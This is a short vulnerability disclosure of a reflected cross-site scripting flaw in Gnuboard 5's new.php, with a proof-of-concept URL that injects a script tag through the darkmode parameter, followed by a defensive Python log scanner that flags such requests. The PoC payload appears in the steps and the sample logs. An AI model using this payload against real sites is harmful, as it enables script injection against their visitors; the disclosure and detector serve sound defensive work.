Cross-site Scripting (XSS) - Reflected in gnuboard/gnuboard5
Aug 11th 2022
The reflected XSS vulnerability occurs due to a flaw in the clean_xss_tags() function called in new.php of Gnuboard 5.
- Open https://sir.kr/bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
- The payload executes.
Through this vulnerability, an attacker is able to execute malicious scripts.
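
A defender-side check for the request pattern in the steps above, as an added example that is not part of the original report or of Gnuboard's code: it scans access-log lines for requests to new.php whose query parameters decode to HTML markup characters. The log lines are constructed, and the combined log format and the premise that legitimate parameter values never contain these characters are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that let a reflected value break out of an HTML attribute or tag.
MARKUP_CHARS = re.compile(r"[<>\"'`]")
# Request target inside a combined-format access log line (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target, path_suffix="/bbs/new.php"):
    """Return (name, decoded value) pairs that carry markup characters."""
    parts = urlsplit(target)
    if not parts.path.endswith(path_suffix):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)
        if MARKUP_CHARS.search(value):
            hits.append((name, value))
    return hits

def scan_log(lines):
    """Return (line number, parameter, decoded value) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings += [(number, n, v) for n, v in suspicious_params(match.group(1))]
    return findings

# Constructed sample log; line 1 carries the request from the report's steps.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Aug/2022:10:00:01 +0000] "GET /bbs/new.php?darkmode=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.4 - - [11/Aug/2022:10:00:05 +0000] "GET /bbs/new.php?darkmode=1 HTTP/1.1" 200 5088',
    '203.0.113.7 - - [11/Aug/2022:10:00:09 +0000] "GET /bbs/new.php?darkmode=%2522%253E HTTP/1.1" 200 5090',
    '192.0.2.10 - - [11/Aug/2022:10:00:12 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit only shows that markup reached the endpoint; whether it was reflected unescaped still has to be confirmed against the response or the deployed version.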